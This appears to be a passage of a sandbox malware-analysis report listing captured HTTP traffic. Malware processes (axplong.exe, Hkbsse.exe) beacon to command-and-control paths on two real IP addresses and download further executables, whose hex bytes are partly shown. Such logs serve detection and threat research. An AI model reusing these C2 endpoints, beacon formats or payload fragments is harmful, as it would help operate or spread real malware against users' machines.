Jun 24, 2024 00:10:09.157046080 CEST	1236	IN	Data Raw: 5d 74 08 85 ff 0f 85 de fe ff ff 4d eb 0e 89 2e 8b 5c 24 04 e9 8c fa ff ff 4d 31 db 0f b6 c3 50 e8 12 69 00 00 83 c4 04 85 c0 74 15 45 89 2e 0f b6 5d 00 53 e8 fe 68 00 00 83 c4 04 45 85 c0 75 ec 80 fb 5d 8b 5c 24 08 75 26 8b 0c 24 85 c9 74 14 8b Data Ascii: ]tM.\$M1PitE.]ShEu]\$u&$tQUD+t$,1tS+UDSmt$a1M]M1S?t$USWV1l$0$t&1
Jun 24, 2024 00:10:09.157067060 CEST	1236	IN	Data Raw: 08 39 51 08 76 13 8b 49 04 8b 0c 91 85 c9 74 09 83 79 04 04 75 03 8b 41 08 c3 cc cc cc cc cc cc cc cc cc 57 56 8b 44 24 0c 85 c0 0f 84 0c 01 00 00 8b 48 04 83 f9 02 0f 84 bf 00 00 00 83 f9 05 0f 84 bb 00 00 00 83 f9 04 0f 85 ee 00 00 00 8b 70 08 Data Ascii: 9QvItyuAWVD$Hp~t.1F4DF4G;~rFFF vDvDvDvDvDFFFF
Jun 24, 2024 00:10:09.157078981 CEST	1236	IN	Data Raw: 0b 44 00 83 c4 04 56 ff 15 c8 0b 44 00 83 c4 04 b8 ff ff ff ff 83 c4 2c 5e 5f 5b 5d c3 31 db 89 5c 24 08 83 7f 18 00 74 2b 31 ed 90 90 90 90 8b 47 0c 8b 4f 10 8b 14 a8 8b 34 a9 8d 4c 24 08 56 e8 3a fc ff ff 83 c4 04 85 c0 75 6b 89 1e 45 3b 6f 18 Data Ascii: DVD,^_[]1\$t+1GO4L$V:ukE;orGGG wDwDwDwDwDt$1^D$ D$$D$(t$Dt$Dt$D
Jun 24, 2024 00:10:09.157759905 CEST	1236	IN	Data Raw: eb 35 80 f9 61 7c 0c 80 f9 67 72 28 b8 ff ff ff ff eb 26 89 ca 80 c1 bf b8 ff ff ff ff 80 f9 05 8b 0c 24 77 17 89 d0 83 c8 be 83 e2 be 01 d0 83 c0 0b eb 08 83 c1 a9 89 c8 8b 0c 24 83 f9 ff 74 23 83 ff ff 74 1e 83 fb ff 74 19 83 f8 ff 74 14 c1 e1 Data Ascii: 5a\|gr(&$w$t#ttt]1^_[]USWVtfQDt<C1tKtQPU'WKQDk{^_[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49710	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:10.284370899 CEST	180	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 34 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000047001&unit=246122658369
Jun 24, 2024 00:10:11.951709032 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jun 24, 2024 00:10:11.951935053 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jun 24, 2024 00:10:11.952256918 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jun 24, 2024 00:10:11.952728987 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49711	185.172.128.116	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:11.962224007 CEST	54	OUT	GET /NewLatest.exe HTTP/1.1 Host: 185.172.128.116
Jun 24, 2024 00:10:12.626422882 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:12 GMT Content-Type: application/octet-stream Content-Length: 424960 Last-Modified: Sun, 16 Jun 2024 06:41:45 GMT Connection: keep-alive ETag: "666e8929-67c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 29 89 6e 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 ea d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PEL)nf@@,K8l@.text `.rdata:@@.datae 4@.rsrc.@@.relocKL0@B
Jun 24, 2024 00:10:12.626465082 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 30 c1 44 00 e8 4a c5 01 00 59 c3 cc cc cc cc 68 d0 c0 44 00 e8 3a c5 01 00 59 Data Ascii: h0DJYhD:Yj hPE$,FnhDYj htE1FnhDYjhEl2FnhPDYj hE-FonhDYjhE1FOnhDY
Jun 24, 2024 00:10:12.626476049 CEST	1236	IN	Data Raw: cc cc cc 6a 04 68 64 85 45 00 b9 6c 2f 46 00 e8 4f 6a 01 00 68 10 cf 44 00 e8 99 c0 01 00 59 c3 cc cc cc 6a 04 68 6c 85 45 00 b9 78 34 46 00 e8 2f 6a 01 00 68 70 cf 44 00 e8 79 c0 01 00 59 c3 cc cc cc 6a 04 68 74 85 45 00 b9 ec 30 46 00 e8 0f 6a Data Ascii: jhdEl/FOjhDYjhlEx4F/jhpDyYjhtE0FjhDYYjh\|E85Fih0D9YjhET2FihDYjhEFihDYjhEFihPDYjhE.Foi
Jun 24, 2024 00:10:12.626509905 CEST	1236	IN	Data Raw: 68 50 dd 44 00 e8 d9 bb 01 00 59 c3 cc cc cc 6a 08 68 74 87 45 00 b9 fc 2f 46 00 e8 6f 65 01 00 68 b0 dd 44 00 e8 b9 bb 01 00 59 c3 cc cc cc 6a 08 68 80 87 45 00 b9 a4 33 46 00 e8 4f 65 01 00 68 10 de 44 00 e8 99 bb 01 00 59 c3 cc cc cc 6a 10 68 Data Ascii: hPDYjhtE/FoehDYjhE3FOehDYjhE.F/ehpDyYjhE4FehDYYjhE5Fdh0D9YjhE2FdhDYj@hE\-FdhDYjh
Jun 24, 2024 00:10:12.626519918 CEST	1236	IN	Data Raw: 45 00 b9 bc 30 46 00 e8 af 60 01 00 68 f0 eb 44 00 e8 f9 b6 01 00 59 c3 cc cc cc 6a 08 68 f8 8b 45 00 b9 f4 2b 46 00 e8 8f 60 01 00 68 50 ec 44 00 e8 d9 b6 01 00 59 c3 cc cc cc 6a 14 68 04 8c 45 00 b9 2c 30 46 00 e8 6f 60 01 00 68 b0 ec 44 00 e8 Data Ascii: E0F`hDYjhE+F`hPDYjhE,0Fo`hDYj4hED-FO`hDYjhTE)F/`hpDyYjh\ED3F`hDYYjhxE,F_h0D9YjhE0F_hD
Jun 24, 2024 00:10:12.626527071 CEST	1236	IN	Data Raw: c0 56 66 0f d6 06 e8 fa 90 01 00 56 e8 03 91 01 00 83 c4 08 8b c6 5e 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 b8 87 44 00 64 a1 00 00 00 00 50 a1 14 20 46 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8d 45 08 c7 45 fc 00 00 00 Data Ascii: VfV^]UjhDdP F3PEdEEPdUM2hEEPuUVWFPEfEPdE^]UVWFPEfEPE
Jun 24, 2024 00:10:12.626533985 CEST	1236	IN	Data Raw: 0b 6a 14 56 e8 73 ad 01 00 83 c4 08 8b c6 5e 5d c2 04 00 55 8b ec 6a ff 68 28 88 44 00 64 a1 00 00 00 00 50 83 ec 1c 56 a1 14 20 46 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 6a 00 68 5b 81 45 00 8d 4d d8 89 75 f0 c7 45 e8 00 00 00 00 Data Ascii: jVs^]Ujh(DdPV F3PEdujh[EMuEEEVEEPuuIUr(MBrI#+w$RQEMdY^]BUVuWWGPEfFP
Jun 24, 2024 00:10:12.626626015 CEST	840	IN	Data Raw: c9 74 06 8b 01 6a 01 ff 10 c3 cc cc cc cc cc 55 8b ec f6 45 08 01 56 8b f1 c7 06 dc 1a 45 00 74 0b 6a 08 56 e8 7f a8 01 00 83 c4 08 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 56 8b f1 c7 06 dc 1a 45 00 89 46 04 8d Data Ascii: tjUEVEtjV^]UEVEFFPEFF4jP[FdFh^]VF4EPFPE^UVF4EPFPEEtjlV
Jun 24, 2024 00:10:12.626638889 CEST	1236	IN	Data Raw: ff ff ff 38 45 e7 0f 84 92 00 00 00 33 f6 b9 01 00 00 00 f0 0f b1 0b 85 c0 74 07 8b f0 83 f8 03 77 07 ff 24 b5 e0 30 40 00 e8 81 85 01 00 3b f0 74 6c b8 02 00 00 00 87 03 83 f8 03 74 60 0f 57 c0 8d 77 34 66 0f 13 45 e8 56 89 75 e8 c6 45 ec 00 e8 Data Ascii: 8E3tw$0@;tlt`Ww4fEVuEPukEE_8GduVSu78GdtVE4u0MdY_^[M35]PPPP0@0@0@0@Ujh@Dd
Jun 24, 2024 00:10:12.626657009 CEST	1236	IN	Data Raw: cc cc cc 55 8b ec 6a ff 68 37 8a 44 00 64 a1 00 00 00 00 50 83 ec 14 a1 14 20 46 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b da 8b f1 6a 28 e8 d2 9d 01 00 8b f8 83 c4 04 89 7d e4 c7 45 fc 00 00 00 00 89 7d ec c7 47 24 00 00 00 00 Data Ascii: Ujh7DdP F3ESVWPEdj(}E}G$EN$tWG$EuC}EO$PO$t;PRG$j(WnWfEBptFpMuEWh4@tME
Jun 24, 2024 00:10:12.631587029 CEST	1036	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 a0 8a 44 00 64 a1 00 00 00 00 50 51 53 56 57 a1 14 20 46 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 8b 4e 48 83 cf ff c7 06 88 90 45 00 83 f9 02 74 0f 8b c7 f0 0f c1 41 04 48 75 05 Data Ascii: UjhDdPQSVW F3PEdNHEtAHuPtQ+rP#+QP'tCuCuP^PC(PSFP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49712	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:13.805957079 CEST	180	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 36 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000064001&unit=246122658369
Jun 24, 2024 00:10:14.501410961 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49718	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:15.885759115 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:16.521927118 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:16.522865057 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:16.715747118 CEST	345	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 39 62 0d 0a 20 3c 63 3e 31 30 30 30 30 31 34 30 30 31 2b 2b 2b 61 36 64 33 39 31 37 62 38 35 30 65 38 61 35 65 34 36 33 30 62 35 64 63 64 38 63 64 65 62 62 31 61 65 36 30 34 64 32 66 33 65 64 35 36 30 34 64 37 62 38 36 38 61 23 31 30 30 30 30 31 35 30 30 31 2b 2b 2b 61 36 64 33 39 31 37 62 63 63 31 62 38 61 34 30 31 64 36 61 66 36 39 66 38 61 38 37 65 62 66 30 66 37 37 37 31 37 37 33 37 66 63 63 37 65 32 35 37 37 38 63 39 63 38 63 34 65 34 63 64 64 61 61 37 30 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 9b <c>1000014001+++a6d3917b850e8a5e4630b5dcd8cdebb1ae604d2f3ed5604d7b868a#1000015001+++a6d3917bcc1b8a401d6af69f8a87ebf0f77717737fcc7e25778c9c8c4e4cddaa70#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49723	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:17.400356054 CEST	180	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000091001&unit=246122658369
Jun 24, 2024 00:10:18.111778021 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jun 24, 2024 00:10:18.118319988 CEST	50	OUT	GET /lend/legs.exe HTTP/1.1 Host: 77.91.77.81
Jun 24, 2024 00:10:18.338529110 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:18 GMT Content-Type: application/octet-stream Content-Length: 675368 Last-Modified: Mon, 17 Jun 2024 16:10:43 GMT Connection: keep-alive ETag: "66706003-a4e28" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c5 0b f2 5c 81 6a 9c 0f 81 6a 9c 0f 81 6a 9c 0f 52 18 9f 0e 90 6a 9c 0f 52 18 99 0e 2f 6a 9c 0f 52 18 98 0e 97 6a 9c 0f 43 eb 98 0e 93 6a 9c 0f 52 18 9d 0e 86 6a 9c 0f 81 6a 9d 0f 07 6a 9c 0f 43 eb 99 0e dc 6a 9c 0f 43 eb 9f 0e 99 6a 9c 0f 72 e8 99 0e 80 6a 9c 0f 72 e8 63 0f 80 6a 9c 0f 72 e8 9e 0e 80 6a 9c 0f 52 69 63 68 81 6a 9c 0f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8d 5c 70 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 7e 02 00 00 b8 07 00 00 00 00 00 e6 c1 00 00 00 10 00 00 00 90 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0a 00 00 04 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$\jjjRjR/jRjCjRjjjCjCjrjrcjrjRichjPEL\pf'~@p@TE(0((&@x"@h.text\|~ `.rdata@@.dataDP@@.rsrc0@@.relocx"@$@B
Jun 24, 2024 00:10:18.338547945 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 b8 11 4a 00 e8 e4 8f 00 00 68 32 8c 42 00 e8 5b b4 00 00 59 c3 6a 08 b8 0b 89 Data Ascii: Jh2B[YjBkIEpIEeIHBEh9CPh\|IMh<BjJBdIEIEedI\|BEh<=CPhI*Mh?B
Jun 24, 2024 00:10:18.338563919 CEST	1236	IN	Data Raw: c7 46 04 01 00 00 00 c7 46 08 00 00 00 00 c7 00 00 00 00 00 c7 40 04 00 00 00 00 e8 99 96 00 00 8d 46 14 0f 57 c0 c7 00 00 00 00 00 c7 40 04 00 00 00 00 c7 40 08 00 00 00 00 0f 11 40 0c 6a 02 66 0f d6 40 1c c7 40 24 00 00 00 00 50 c7 40 28 00 00 Data Ascii: FF@FW@@@jf@@$P@(@,0FDPPD$FlFpfFtFvFxBA$BAI$^SUVWt$.0BEEzoHtA
Jun 24, 2024 00:10:18.338579893 CEST	672	IN	Data Raw: ff 0f 77 21 57 ff 74 24 10 89 7b 10 53 c7 43 14 0f 00 00 00 e8 56 ba 00 00 83 c4 0c c6 04 1f 00 5f 5b c2 08 00 8b c7 83 c8 0f 3d ff ff ff 7f 76 07 b8 ff ff ff 7f eb 0a b9 16 00 00 00 3b c1 0f 42 c1 89 44 24 10 8d 44 24 10 56 50 53 e8 3d ff ff ff Data Ascii: w!Wt${SCV_[=v;BD$D$VPS=L$Wt$3V{K>^_[SUjhPBdPSVWI3PEdeuE+EF+=?X]N+?+;v?
Jun 24, 2024 00:10:18.338653088 CEST	1236	IN	Data Raw: 44 24 28 89 4c 24 18 56 8b 74 24 7c 57 85 ed 74 11 8a 06 3c 2b 74 04 3c 2d 75 07 bb 01 00 00 00 eb 02 33 db 8b 41 14 25 00 30 00 00 3d 00 30 00 00 74 07 ba e4 96 42 00 eb 22 8d 43 02 ba e8 96 42 00 3b c5 77 16 80 3c 1e 30 75 10 8a 4c 1e 01 80 f9 Data Ascii: D$(L$Vt$\|Wt<+t<-u3A%0=0tB"CB;w<0uLxtXuRV<2D$,.fD$2D$D$PV2D$ @0HL$,L$PD$PL$0D$tPtjjUL$<4\|$HD$4L$GD$4P.
Jun 24, 2024 00:10:18.338677883 CEST	1236	IN	Data Raw: e8 e6 01 00 00 83 c4 04 8b c8 8b 10 6a 0a 8b 42 20 ff d0 88 44 24 14 85 ff 74 13 8b 07 8b cf ff 50 08 85 c0 74 08 8b 10 8b c8 6a 01 ff 12 ff 74 24 14 8b ce e8 b2 6e 00 00 8b ce e8 7b 62 00 00 5f 8b c6 5e 83 c4 08 c3 cc cc cc 8b 44 24 04 c3 cc cc Data Ascii: jB D$tPtjt$n{b_^D$@SUVW3L$S\$~=JJD$u1WL$~9JuJ@JJL$~=JL$T,I;ysA4(38YtF;xs@4(
Jun 24, 2024 00:10:18.338692904 CEST	1236	IN	Data Raw: 8d 44 24 1c 57 50 e8 50 8d 00 00 89 5e 04 83 c4 08 c7 06 64 96 42 00 bb 01 00 00 00 eb 02 33 f6 f6 c3 01 74 09 8d 4c 24 1c e8 09 14 00 00 56 e8 f7 8b 00 00 8b 16 83 c4 04 8b ce ff 52 04 89 35 b0 11 4a 00 8d 4c 24 18 e8 6d 7a 00 00 5f 8b c6 5e 5d Data Ascii: D$WPP^dB3tL$VR5JL$mz_^][@hDB{SUVWjL$y=JJ\$u1WL$y9=JuJ@JJL$z=JL$ ,I;ysA4(ug3ytm;xs@
Jun 24, 2024 00:10:18.338777065 CEST	672	IN	Data Raw: 42 c1 89 44 24 0c 8d 44 24 0c 56 50 57 e8 61 ee ff ff 8b 4c 24 18 8b f0 89 4f 14 0f be 4c 24 1c 53 51 56 89 37 89 5f 10 e8 a6 ae 00 00 83 c4 14 c6 04 1e 00 8b c7 5e 5f 5b c2 08 00 e8 32 42 00 00 cc cc 8b 54 24 04 0f 57 c0 56 8b f1 8b c2 57 0f 11 Data Ascii: BD$D$VPWaL$OL$SQV7_^_[2BT$WVWFxF@u+PR]_^D$VW\|$W>FuG,=t_F^jHjG,4I3D$0SU
Jun 24, 2024 00:10:18.338790894 CEST	1236	IN	Data Raw: 1f 77 2b 51 52 e8 e9 94 00 00 83 c4 08 47 3b 7e 10 0f 82 5c fe ff ff 8b 4c 24 40 8b c3 5f 5e 5d 5b 33 cc e8 e4 97 00 00 83 c4 34 c2 04 00 e8 ef dd 00 00 68 2c 40 00 70 2c 40 00 78 2c 40 00 84 2c 40 00 91 2c 40 00 96 2c 40 00 7f 2c 40 00 9b 2c 40 Data Ascii: w+QRG;~\L$@_^][34h,@p,@x,@,@,@,@,@,@,@,@,@,@,@,@,@D$VBFFP(BF}F4W@@@jf@@$P@(@,'FdFh^
Jun 24, 2024 00:10:18.338805914 CEST	1236	IN	Data Raw: 7b 00 00 83 c4 0c c7 43 58 00 00 00 00 83 cd ff c7 43 5c 00 00 00 00 85 ff 74 3d f0 ff 47 04 8b 44 24 10 89 43 58 8b 44 24 14 89 7b 5c 89 43 60 8b c5 c7 43 64 00 00 00 00 f0 0f c1 47 04 75 30 8b 07 8b cf ff 10 8b c5 f0 0f c1 47 08 75 21 8b 07 8b Data Ascii: {CXC\t=GD$CXD${\C`CdGu0Gu!PD$CXD${\C`CdD$fFHt@\|$$tGuoMuP_^][V
Jun 24, 2024 00:10:18.338824034 CEST	1236	IN	Data Raw: 24 0c 0f 57 c0 56 8b f1 89 44 24 04 8d 56 04 c6 44 24 08 01 52 8d 44 24 08 c7 06 28 92 42 00 50 66 0f d6 02 e8 40 98 00 00 83 c4 08 c7 06 94 92 42 00 8b c6 5e 83 c4 08 c2 04 00 56 8b f1 57 8b 7c 24 0c 89 3e 8b 07 8b 40 04 8b 4c 38 38 85 c9 74 05 Data Ascii: $WVD$VD$RD$(BPf@B^VW\|$>@L88tP@\|88t2F_^I<t ;tIL@\|8_F^F_^Vt$WWGP(BfFPBFNGOB_^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49725	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:19.956617117 CEST	180	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000092001&unit=246122658369
Jun 24, 2024 00:10:20.636631966 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jun 24, 2024 00:10:20.681976080 CEST	56	OUT	GET /lend/taskweaker.exe HTTP/1.1 Host: 77.91.77.81
Jun 24, 2024 00:10:20.900943995 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:20 GMT Content-Type: application/octet-stream Content-Length: 6098432 Last-Modified: Sat, 22 Jun 2024 14:27:53 GMT Connection: keep-alive ETag: "6676df69-5d0e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 e8 20 00 00 0a 5d 00 00 ca 05 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 63 00 00 04 00 00 7a ec 5d 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 60 00 4e 00 00 00 00 a0 60 00 d0 13 00 00 00 e0 60 00 eb a2 01 00 00 e0 59 00 d8 c0 00 00 00 00 00 00 00 00 00 00 00 90 62 00 a0 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 c3 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$ ]@`cz]` `N``YbY(\|`@.text ```.data0! @`.rdata3&3%@`@.pdataYY@0@.xdataDZzZ@0@.bssZ`.edataN`Z@0@.idata`Z@0.CRTp`Z@@.tls`Z@@.rsrc`Z@0.relocbF\@0B
